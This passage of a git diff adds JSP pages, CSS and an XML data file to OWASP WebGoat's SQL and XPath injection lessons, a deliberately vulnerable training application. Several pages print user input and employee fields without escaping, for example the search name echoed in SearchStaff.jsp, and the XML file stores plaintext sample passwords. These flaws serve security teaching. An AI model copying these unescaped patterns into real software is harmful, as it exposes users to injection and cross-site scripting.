+						<input class="lesson_text_db" name="<%=SQLInjection.ADDRESS2%>" type="text" value="<%=employee.getAddress2()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=SQLInjection.PHONE_NUMBER%>" type="text" value="<%=employee.getPhoneNumber()%>"/>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=SQLInjection.START_DATE%>" type="text" value="<%=employee.getStartDate()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<input class="lesson_text_db" name="<%=SQLInjection.SSN%>" type="text" value="<%=employee.getSsn()%>"/> 
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=SQLInjection.SALARY%>" type="text" value="<%=employee.getSalary()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=SQLInjection.CCN%>" type="text" value="<%=employee.getCcn()%>"/>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=SQLInjection.CCN_LIMIT%>" type="text" value="<%=employee.getCcnLimit()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=SQLInjection.DESCRIPTION%>" type="text" value="<%=employee.getPersonalDescription()%>"/>
+					</TD>
+					<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<select class="lesson_text_db" name="<%=SQLInjection.MANAGER%>">
+						<%
+				      	List employees = (List) session.getAttribute("SQLInjection.Staff");
+				      	Iterator i = employees.iterator();
+						while (i.hasNext())
+						{
+							EmployeeStub stub = (EmployeeStub) i.next();
+								%>
+								<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()%></option>
+						<%}%>
+						</select>
+					</TD>	
+				</TR>
+				<TR><TD>
+						Disciplinary Explanation: 
+					</TD>
+					<TD>
+						<textarea name="<%=SQLInjection.DISCIPLINARY_NOTES%>"  cols="16" rows="3" class="lesson_text_db" ><%=employee.getDisciplinaryActionNotes()%></textarea>
+					</TD>
+					<TD>				
+						Disciplinary Action Dates: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=SQLInjection.DISCIPLINARY_DATE%>" type="text" value="<%=employee.getDisciplinaryActionDate()%>"/>
+					</TD>
+				</TR>
+				</Table>
+				<BR>
+				<div class="lesson_buttons_bottom">
+				<table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+               		<tr>
+                     		<td width="57">
+							<input type="submit" name="action" value="<%=SQLInjection.VIEWPROFILE_ACTION%>"/>
+				  		</td>
+				  		
+                       	<td width="81">
+ 							<input name="<%=SQLInjection.EMPLOYEE_ID%>" type="hidden" value="<%=employee.getId()%>">
+							<input name="<%=SQLInjection.TITLE%>" type="hidden" value="<%=employee.getTitle()%>">
+							<input type="submit" name="action" value="<%=SQLInjection.UPDATEPROFILE_ACTION%>"/>
+						</td>
+                        	<td width="211"></td>
+                        	<td width="83">
+	 						<input type="submit" name="action" value="<%=SQLInjection.LOGOUT_ACTION%>"/>
+						</td>
+                 	</tr>
+              	</table>			
+			</div></form>
+		</div>	
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/SQLInjection/ListStaff.jsp b/main/project/WebContent/lessons/SQLInjection/ListStaff.jsp
new file mode 100644
index 000000000..425867c3b
--- /dev/null
+++ b/main/project/WebContent/lessons/SQLInjection/ListStaff.jsp
@@ -0,0 +1,55 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	int myUserId = webSession.getUserIdInLesson();
+%>
+	<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - Staff Listing Page</div>
+		<br>
+		<br>
+		<br>
+		<p>Select from the list below	</p>
+
+		<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+  <table width="60%" border="0" cellpadding="3">
+    <tr>
+      <td>  <label>
+  <select name="<%=SQLInjection.EMPLOYEE_ID%>" size="11">
+			      	<%
+			      	List employees = (List) session.getAttribute("SQLInjection." + SQLInjection.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();%>
+						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
+					}%>
+  </select>
+  </label></td>
+      <td>
+	        	<input type="submit" name="action" value="<%=SQLInjection.SEARCHSTAFF_ACTION%>"/><br>
+	        	<input type="submit" name="action" value="<%=SQLInjection.VIEWPROFILE_ACTION%>"/><br>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, SQLInjection.CREATEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=SQLInjection.CREATEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, SQLInjection.DELETEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=SQLInjection.DELETEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+			<br>
+					<input type="submit" name="action" value="<%=SQLInjection.LOGOUT_ACTION%>"/>
+	  </td>
+    </tr>
+  </table>
+
+		</form>
+		
diff --git a/main/project/WebContent/lessons/SQLInjection/Login.jsp b/main/project/WebContent/lessons/SQLInjection/Login.jsp
new file mode 100644
index 000000000..a88d694db
--- /dev/null
+++ b/main/project/WebContent/lessons/SQLInjection/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection" 
+	errorPage="" %>
+	<div id="lesson_login">
+		<div id="lesson_login_txt">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>
+			      	<select name="<%=SQLInjection.EMPLOYEE_ID%>">
+			      	<%
+			      	//System.out.println("Retrieving employees list");
+			      	List employees = (List) session.getAttribute("SQLInjection." + SQLInjection.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();
+					%>
+			      	<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName() + " (" + stub.getRole() + ")"%></option>
+					<%}%>
+	                </select>
+		        </label>
+				<br>
+			    	<label>Password
+			    		<input name="password" type="password" size="10" maxlength="8" />
+			    </label>
+				<br>
+				<input type="submit" name="action" value="<%=SQLInjection.LOGIN_ACTION%>"/>
+			</form>
+		</div>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/SQLInjection/SQLInjection.css b/main/project/WebContent/lessons/SQLInjection/SQLInjection.css
new file mode 100644
index 000000000..177129117
--- /dev/null
+++ b/main/project/WebContent/lessons/SQLInjection/SQLInjection.css
@@ -0,0 +1,14 @@
+#lesson_wrapper {height: 435px;width: 500px;}
+#lesson_header {background-image: url(lessons/SQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
+.lesson_workspace {background-image: url(lessons/SQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
+.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
+#lesson_buttons_bottom {height: 20px;width: 460px;}
+#lesson_b_b_left {width: 300px;float: left;}
+#lesson_b_b_right input {width: 100px;float: right;}
+.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
+.lesson_workspace { }
+.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
+.lesson_text_db {color: #0066FF}
+#lesson_login {background-image: url(lessons/SQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
+#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
+#lesson_search {background-image: url(lessons/SQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/main/project/WebContent/lessons/SQLInjection/SQLInjection.jsp b/main/project/WebContent/lessons/SQLInjection/SQLInjection.jsp
new file mode 100644
index 000000000..51dbc4f3f
--- /dev/null
+++ b/main/project/WebContent/lessons/SQLInjection/SQLInjection.jsp
@@ -0,0 +1,26 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection" 
+	errorPage="" %>
+<style>
+<jsp:include page="SQLInjection.css" />
+</style>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+SQLInjection currentLesson = (SQLInjection) webSession.getCurrentLesson();
+%>
+<div id="lesson_wrapper">
+	<div id="lesson_header"></div>
+	<div class="lesson_workspace">
+	<%
+	String subViewPage = currentLesson.getPage(webSession);
+	if (subViewPage != null)
+	{
+		//System.out.println("Including sub view page: " + subViewPage);
+	%>
+	<jsp:include page="<%=subViewPage%>" />
+	<%
+	}
+	%>
+
+	</div>
+</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/SQLInjection/SearchStaff.jsp b/main/project/WebContent/lessons/SQLInjection/SearchStaff.jsp
new file mode 100644
index 000000000..cf86d0dad
--- /dev/null
+++ b/main/project/WebContent/lessons/SQLInjection/SearchStaff.jsp
@@ -0,0 +1,22 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection" 
+	errorPage="" %>
+	<div id="lesson_search">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			String searchedName = request.getParameter(SQLInjection.SEARCHNAME);
+			if (searchedName != null)
+			{
+			%>
+				Employee <%=searchedName%> not found.
+			<%
+			}
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>Name
+					<input class="lesson_text_db" type="text" name="<%=SQLInjection.SEARCHNAME%>"/>
+		        </label>
+				<br>
+				<input type="submit" name="action" value="<%=SQLInjection.FINDPROFILE_ACTION%>"/>
+			</form>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/SQLInjection/ViewProfile.jsp b/main/project/WebContent/lessons/SQLInjection/ViewProfile.jsp
new file mode 100644
index 000000000..a05a0bc39
--- /dev/null
+++ b/main/project/WebContent/lessons/SQLInjection/ViewProfile.jsp
@@ -0,0 +1,154 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.SQLInjection.SQLInjection" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("SQLInjection." + SQLInjection.EMPLOYEE_ATTRIBUTE_KEY);
+//	int myUserId = getIntSessionAttribute(webSession, "SQLInjection." + SQLInjection.USER_ID);
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span></div>
+		<div class="lesson_text">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<%=employee.getFirstName()%>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<%=employee.getLastName()%>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<%=employee.getAddress1()%>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<%=employee.getAddress2()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<%=employee.getPhoneNumber()%>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<%=employee.getStartDate()%>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<%=employee.getSsn()%>
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<%=employee.getSalary()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<%=employee.getCcn()%>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<%=employee.getCcnLimit()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD>
+						<%=employee.getPersonalDescription()%>
+					</TD>
+					<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<%=employee.getManager()%>
+					</TD>	
+				</TR>
+				<TR><TD>
+						Disciplinary Explanation: 
+					</TD>
+					<TD>
+						<%=employee.getDisciplinaryActionNotes()%>
+					</TD>
+					<TD>				
+						Disciplinary Action Dates: 
+					</TD>
+					<TD>
+						<%=employee.getDisciplinaryActionDate()%>
+					</TD>
+				</TR>
+				</Table>
+		</div>
+		<div class="lesson_buttons_bottom">
+		    <table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+                 <tr>
+                 	<td width="50">
+					 <%					
+					 if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), SQLInjection.LISTSTAFF_ACTION))
+					 {
+					 %>                	
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=SQLInjection.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=SQLInjection.LISTSTAFF_ACTION%>"/>
+						</form>
+					 <%
+					 }
+					 %>
+					 </td>
+		             <td width="50">
+					 <%					
+					 if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), SQLInjection.EDITPROFILE_ACTION))
+					 {
+					 %>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=SQLInjection.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=SQLInjection.EDITPROFILE_ACTION%>"/>
+						</form>
+					<%
+					}
+					%>
+					</td>					
+                    <td width="60">
+					<%					
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), SQLInjection.DELETEPROFILE_ACTION))
+					{
+					%>
+						<form method="POST" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+							<input type="hidden" name="<%=SQLInjection.EMPLOYEE_ID%>" value="<%=employee.getId()%>">
+							<input type="submit" name="action" value="<%=SQLInjection.DELETEPROFILE_ACTION%>"/>
+						</form>
+					<%
+					}
+					%>
+					</td>
+                      <td width="190">&nbsp;</td>
+                      <td width="76">
+						<form method="POST">
+							<input type="submit" name="action" value="<%=SQLInjection.LOGOUT_ACTION%>"/>
+						</form>
+					</td>
+				</tr>
+         	</table>
+		</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/SQLInjection/error.jsp b/main/project/WebContent/lessons/SQLInjection/error.jsp
new file mode 100644
index 000000000..5af0a45dc
--- /dev/null
+++ b/main/project/WebContent/lessons/SQLInjection/error.jsp
@@ -0,0 +1,3 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	errorPage="" %>
+<br><br><br>An error has occurred.
diff --git a/main/project/WebContent/lessons/SQLInjection/images/lesson1_SearchWindow.jpg b/main/project/WebContent/lessons/SQLInjection/images/lesson1_SearchWindow.jpg
new file mode 100644
index 000000000..39e1ed80d
Binary files /dev/null and b/main/project/WebContent/lessons/SQLInjection/images/lesson1_SearchWindow.jpg differ
diff --git a/main/project/WebContent/lessons/SQLInjection/images/lesson1_header.jpg b/main/project/WebContent/lessons/SQLInjection/images/lesson1_header.jpg
new file mode 100644
index 000000000..60a809af0
Binary files /dev/null and b/main/project/WebContent/lessons/SQLInjection/images/lesson1_header.jpg differ
diff --git a/main/project/WebContent/lessons/SQLInjection/images/lesson1_loginWindow.jpg b/main/project/WebContent/lessons/SQLInjection/images/lesson1_loginWindow.jpg
new file mode 100644
index 000000000..c91f8a052
Binary files /dev/null and b/main/project/WebContent/lessons/SQLInjection/images/lesson1_loginWindow.jpg differ
diff --git a/main/project/WebContent/lessons/SQLInjection/images/lesson1_menu.jpg b/main/project/WebContent/lessons/SQLInjection/images/lesson1_menu.jpg
new file mode 100644
index 000000000..2c9512571
Binary files /dev/null and b/main/project/WebContent/lessons/SQLInjection/images/lesson1_menu.jpg differ
diff --git a/main/project/WebContent/lessons/SQLInjection/images/lesson1_workspace.jpg b/main/project/WebContent/lessons/SQLInjection/images/lesson1_workspace.jpg
new file mode 100644
index 000000000..292d25654
Binary files /dev/null and b/main/project/WebContent/lessons/SQLInjection/images/lesson1_workspace.jpg differ
diff --git a/main/project/WebContent/lessons/XPATHInjection/EmployeesData.xml b/main/project/WebContent/lessons/XPATHInjection/EmployeesData.xml
new file mode 100644
index 000000000..e82f74989
--- /dev/null
+++ b/main/project/WebContent/lessons/XPATHInjection/EmployeesData.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="ISO-8859-1"?>
+<employees>
+	<employee id="1">
+		<loginID>Mike</loginID>
+		<accountno>11123</accountno>
+		<passwd>test123</passwd>
+		<salary>468100</salary>
+	</employee>
+	<employee id="2">
+		<loginID>John</loginID>
+		<accountno>63458</accountno>
+		<passwd>myownpass</passwd>
+		<salary>559833</salary>
+	</employee>
+	<employee id="3">
+		<loginID>Sarah</loginID>
+		<accountno>23363</accountno>
+		<passwd>secret</passwd>
+		<salary>84000</salary>
+	</employee>
+</employees>
diff --git a/main/project/WebContent/main.jsp b/main/project/WebContent/main.jsp
new file mode 100644
index 000000000..43a640d58
--- /dev/null
+++ b/main/project/WebContent/main.jsp
@@ -0,0 +1,246 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.Category, org.owasp.webgoat.lessons.AbstractLesson, java.util.*" 
+	errorPage=""  %>
+<%
+Course course = ((Course)session.getAttribute("course"));
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+AbstractLesson currentLesson = webSession.getCurrentLesson();
+%>
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<%@page import="org.owasp.webgoat.lessons.RandomLessonAdapter"%>
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
+<title><%=currentLesson.getTitle()%></title>
+<link rel="stylesheet" href="css/webgoat.css" type="text/css" />
+<link rel="stylesheet" href="css/lesson.css" type="text/css" />
+<link rel="stylesheet" href="css/menu.css" type="text/css" />
+<link rel="stylesheet" href="css/layers.css" type="text/css" />
+<script language="JavaScript1.2" src="javascript/javascript.js" type="text/javascript"></script>
+<script language="JavaScript1.2" src="javascript/menu_system.js" type="text/javascript"></script>
+<script language="JavaScript1.2" src="javascript/lessonNav.js" type="text/javascript"></script>
+<script language="JavaScript1.2" src="javascript/makeWindow.js" type="text/javascript"></script>
+<script language="JavaScript1.2" src="javascript/toggle.js" type="text/javascript"></script>
+</head>
+<%
+final String menuPrefix = WebSession.MENU;
+final String submenuPrefix = "submenu";
+final String mbutPrefix = "mbut";
+String printHint = "";
+String printParameters = "";
+String printCookies = "";
+String lessonComplete = "<img src=\"images/buttons/lessonComplete.jpg\">";
+
+List categories = course.getCategories();
+
+StringBuffer buildList = new StringBuffer();
+
+	Iterator iter1 = categories.iterator();
+    while(iter1.hasNext())
+    {
+        Category category = (Category)iter1.next();
+        
+        buildList.append("'");
+        buildList.append(menuPrefix);
+        buildList.append(category.getRanking());
+        buildList.append("','");
+        buildList.append(submenuPrefix);
+        buildList.append(category.getRanking());
+        buildList.append("','");
+        buildList.append(mbutPrefix);
+        buildList.append(category.getRanking());
+        buildList.append("'");
+        
+        if (iter1.hasNext())
+        		buildList.append(",");
+    }%>
+<body class="page" onload="setMenuMagic1(10,40,10,'menubottom',<%=buildList%>);trigMM1url('<%= menuPrefix %>',1);MM_preloadImages('images/buttons/hintLeftOver.jpg','images/buttons/hintOver.jpg','images/buttons/hintRightOver.jpg','images/buttons/paramsOver.jpg','images/buttons/htmlOver.jpg','images/buttons/cookiesOver.jpg','images/buttons/javaOver.jpg','images/buttons/plansOver.jpg','images/buttons/logout.jpg','images/buttons/helpOver.jpg'); initIframe();">
+
+	<div id="wrap">
+	<%
+	int topCord = 140;
+	int zIndex = 105;
+	
+		Iterator iter2 = categories.iterator();
+		while(iter2.hasNext())
+		{
+		    Category category = (Category)iter2.next();
+		%>
+		<div id="<%=menuPrefix + category.getRanking()%>" style="position:absolute; left:30px; top:<%=topCord%>px; width:160px; z-index:<%=zIndex%>"><a href="javascript:;" onclick="trigMenuMagic1('<%=menuPrefix + category.getRanking()%>',1);return false" onfocus="if(this.blur)this.blur()"><img src="images/menu_images/1x1.gif" width="1" height=1"20" name="mbut<%=category.getRanking()%>" border="0" alt=""/><%=category.getName()%></a></div>
+		<%
+		topCord=topCord + 30;
+		zIndex=zIndex + 1;
+		}
+		
+			int topSubMenu = 72;
+		
+			Iterator iter3 = categories.iterator();
+			while(iter3.hasNext())
+			{		    
+			    	Category category = (Category)iter3.next();
+				List lessons = webSession.getLessons(category);
+			    Iterator iter4 = lessons.iterator();
+			%>    
+		<div id="submenu<%=category.getRanking()%>" class="pviimenudiv" style="position:absolute; left:200px; top:<%=topSubMenu%>px; width:150px; visibility: hidden; z-index:<%=zIndex%>">
+	  		<table width="150" border="0" cellspacing="6" cellpadding="0"><%
+
+	  		topSubMenu=topSubMenu+30;
+			zIndex=zIndex + 1;
+			
+		  	while(iter4.hasNext())
+			{		  	    
+		    		AbstractLesson lesson = (AbstractLesson)iter4.next();
+		    
+			%><tr>
+	      		<td><%=(lesson.isCompleted(webSession) ? lessonComplete : "")%><a href="<%=lesson.getLink()%>"><%=lesson.getTitle()%></a></td>
+	    		</tr>
+	    		<% if (lesson instanceof RandomLessonAdapter) {
+					RandomLessonAdapter rla = (RandomLessonAdapter) lesson;
+					String[] stages = rla.getStages();
+					for (int i=0; i<stages.length; i++) {
+	    		%>
+			    		<tr><td class="pviimenudivstage"><%=(rla.isStageComplete(webSession, stages[i]) ? lessonComplete : "")%><a href="<%=lesson.getLink() + "&stage=" + (i+1) %>">Stage <%=i+1%>: <%=stages[i] %></a>
+						</td></tr>
+				<% 
+					}
+				}
+				%>
+<%
+			}
+			%>
+	  		</table>
+		</div><%
+			}%>
+		<div id="top"></div>
+		<div id="topRight">
+	  		<div align="right"><a href="attack?action=Logout" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('logout','','images/buttons/logoutOver.jpg',1)"><img src="images/buttons/logout.jpg" alt="LogOut" name="logout" width="45" height="22" border="0" id="logout" /></a>  <a href="#getFAQ()" onmouseout="MM_swapImgRestore()" onmouseover="MM_swapImage('help','','images/buttons/helpOver.jpg',1)"><img src="images/buttons/help.jpg" alt="Help" name="help" width="22" height="22" border="0" id="help" /></a></div>
+		</div>
+			<div id="lessonTitle" align="right"><%=currentLesson.getTitle()%></div>
+			<div id="hMenuBar">
+				<% 
+				if (webSession.isAuthorizedInLesson(webSession.getRole(), WebSession.SHOWHINTS))
+				{
+				%>
+				<a href="<%= webSession.getCurrentLesson().getLink() %>&show=PreviousHint" target="_top" onclick="MM_nbGroup('down','group1','hintLeft','',1)" 
+				onmouseover="MM_nbGroup('over','hintLeft','images/buttons/hintLeftOver.jpg','',1)" 
+				onmouseout="MM_nbGroup('out')">
+				<img src="images/buttons/hintLeft.jpg" alt="Previous Hint" name="hintLeft" width="20" height="20" border="0" id="hintLeft"/>
+				</a>
+				<a href="<%= webSession.getCurrentLesson().getLink() %>&show=NextHint" target="_top" onclick="MM_nbGroup('down','group1','hint','',1)" 
+				onmouseover="MM_nbGroup('over','hint','images/buttons/hintOver.jpg','',1)" 
+				onmouseout="MM_nbGroup('out')">
+				<img src="images/buttons/hint.jpg" alt="Hints" name="hint" width="30" height="20" border="0" id="hint"/>
+				</a>
+				<a href="<%= webSession.getCurrentLesson().getLink() %>&show=NextHint" target="_top" onclick="MM_nbGroup('down','group1','hintRight','',1)" 
+				onmouseover="MM_nbGroup('over','hintRight','images/buttons/hintRightOver.jpg','',1)" 
+				onmouseout="MM_nbGroup('out')">
+				<img src="images/buttons/hintRight.jpg" alt="Next Hint" name="hintRight" width="20" height="20" border="0" id="hintRight"/>
+				</a>
+				<%}%>
+				<a href="<%= webSession.getCurrentLesson().getLink() %>&show=Params" target="_top" onclick="MM_nbGroup('down','group1','params','',1)" 
+				onmouseover="MM_nbGroup('over','params','images/buttons/paramsOver.jpg','',1)" 
+				onmouseout="MM_nbGroup('out')">
+				<img src="images/buttons/params.jpg" alt="Show Params" name="<%= webSession.getCurrentLesson().getLink() %>&show=Params" width="87" height="20" border="0" id="params"/>
+				</a>
+				<a href="<%= webSession.getCurrentLesson().getLink() %>&show=Cookies" target="_top" onclick="MM_nbGroup('down','group1','cookies','',1)" 
+				onmouseover="MM_nbGroup('over','cookies','images/buttons/cookiesOver.jpg','',1)" 
+				onmouseout="MM_nbGroup('out')">
+				<img src="images/buttons/cookies.jpg" alt="Show Cookies" name="cookies" width="99" height="20" border="0" id="cookies"/>
+				</a>
+				<% 
+				if (webSession.isAuthorizedInLesson(webSession.getRole(), WebSession.SHOWSOURCE))
+				{
+				%>
+				<a href="source" onclick="makeWindow(this.href+ '?source=true', 'Java Source');return false;" target="javaWin"
+				onmouseover="MM_nbGroup('over','java','images/buttons/javaOver.jpg','',1)" 
+				onmouseout="MM_nbGroup('out')">
+				<img src="images/buttons/java.jpg" alt="Show Java" name="java" width="75" height="20" border="0" id="java"/>
+				</a>
+				<a href="source" onclick="makeWindow(this.href + '?solution=true', 'Java Solution');return false;" target="javaWin"
+				onmouseover="MM_nbGroup('over','solutions','images/buttons/solutionsOver.jpg','',1)" 
+				onmouseout="MM_nbGroup('out')">
+				<img src="images/buttons/solutions.jpg" alt="Show Solution" name="solutions" width="75" height="20" border="0" id="solutions"/>
+				</a>
+				<a href="javascript:toggle('lessonPlans')" target="_top" onclick="MM_nbGroup('down','group1','plans','',1)" 
+				onmouseover="MM_nbGroup('over','plans','images/buttons/plansOver.jpg','',1)" 
+				onmouseout="MM_nbGroup('out')">
+				<img src="images/buttons/plans.jpg" alt="Lesson Plans" width="89" height="20" border="0" id="plans"/>
+				</a>
+				<%}%>
+								
+			</div>
+			<div id="twoCol">
+	 	 	<div id="menuSpacer"></div>
+	 	 	<div id="lessonArea">
+	 	 	<%
+			    if (currentLesson != null)
+			    {
+			    	%>
+			    	<div id="reset" class="info"><a href="<%=webSession.getRestartLink()%>">Restart this Lesson</a></div>
+	    			<%
+	    			}
+
+				if (webSession.getHint() != null)
+				{
+					printHint = "<div id=\"hint\" class=\"info\">" + webSession.getHint() + "</div><br>";
+					out.println(printHint);
+				}
+				
+				if (webSession.getParams() != null)
+				{
+					Iterator i = webSession.getParams().iterator();
+					while (i.hasNext())
+					{
+						Parameter p = (Parameter) i.next();
+						printParameters = "<div id=\"parameter\" class=\"info\">" + p.getName() + "=" + p.getValue() + "</div><br>";
+						out.println(printParameters);
+					}
+				}
+				
+				if (webSession.getCookies() != null)
+				{
+					Iterator i = webSession.getCookies().iterator();
+					while (i.hasNext())
+					{
+						Cookie c = (Cookie) i.next();
+						printCookies = "<div id=\"cookie\" class=\"info\">" + c.getName() + " <img src=\"images/icons/rightArrow.jpg\" alt=\"\"> " + c.getValue() + "</div><br>";
+						out.println(printCookies);
+					}
+				}%>
+				<div id="lessonPlans" style="visibility:hidden; height:1px; position:absolute; left:260px; top:130px; width:425px; z-index:105;"><%=currentLesson.getLessonPlan(webSession) %>
+				<br/>
+				<br/>
+				<a href="javascript:toggle('lessonPlans')" target="_top" onclick="MM_nbGroup('down','group1','plans','',1)">Close this Window</a>
+				</div>
+				<div id="lessonContent"><%=webSession.getInstructions()%></div>
+				<div id="message" class="info"><%=webSession.getMessage()%></div>
+	
+			<%
+			if (currentLesson.getTemplatePage(webSession) != null)
+			{
+				//System.out.println("Main.jsp - current lesson: " + currentLesson.getName() );
+				//System.out.println("         - template Page: " + currentLesson.getTemplatePage(webSession));
+			%>
+			<jsp:include page="<%=currentLesson.getTemplatePage(webSession)%>" />
+			<%
+			}
+			else
+			{
+			%>
+			<div id="lessonContent"><%=currentLesson.getContent()%></div>
+			<%
+			}
+			%>
+				<div id="credits">
+		  		<% out.println(currentLesson.getCredits());%>
+		  		</div>
+			</div>
+	  	</div>
+
+		<div id="bottom">
+			<div align="center"><a href="http://www.owasp.org">OWASP Foundation</a> | Project WebGoat</div>
+	  	</div>
+	</div>
+</body>
+</html>
diff --git a/main/project/WebContent/sideWindow.jsp b/main/project/WebContent/sideWindow.jsp
new file mode 100644
index 000000000..b9766a0a6
--- /dev/null
+++ b/main/project/WebContent/sideWindow.jsp
@@ -0,0 +1,28 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.WebSession" 
